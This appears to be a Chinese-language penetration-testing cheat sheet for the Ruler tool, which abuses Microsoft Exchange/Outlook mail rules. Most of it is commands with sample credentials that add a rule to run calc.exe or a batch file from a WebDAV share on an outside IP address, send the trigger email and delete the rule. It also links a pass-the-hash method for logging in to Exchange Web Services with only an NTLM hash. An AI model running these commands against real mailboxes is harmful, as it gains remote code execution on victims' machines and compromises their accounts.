利用工具:
https://github.com/sensepost/ruler

工具命令相关记录:

1
2
3
4
5
6
7
8
9
10
ruler-win64.exe -k --email micle@rootkit.org --username micle --password Admin12345 display

ruler-win64.exe -k --email micle@rootkit.org --username micle --password Admin12345 add --location "calc.exe" --trigger "systest" -name test
ruler-win64.exe -k --email micle@rootkit.org --username micle --password Admin12345 add --location "\\\\173.248.241.176\\webdav\\run.bat" --trigger "linux" -name linux

ruler-win64.exe -k --email micle@rootkit.org --username micle --password Admin12345 send --subject "hello linux" --body "ssssss"

ruler-win64.exe -k --email micle@rootkit.org --username micle --password Admin12345 delete --id 0100000005a104b6

ruler-win64.exe -k --email test@pentest.org --username test --password "123456aA!" display

相关文章:
https://paper.seebug.org/775/
https://silentbreaksecurity.com/malicious-outlook-rules/
wbdav搭建

只有NTLM HASH的情况下如何登录exchange操作:
https://github.com/pentest-tools-public/Pass-to-hash-EWS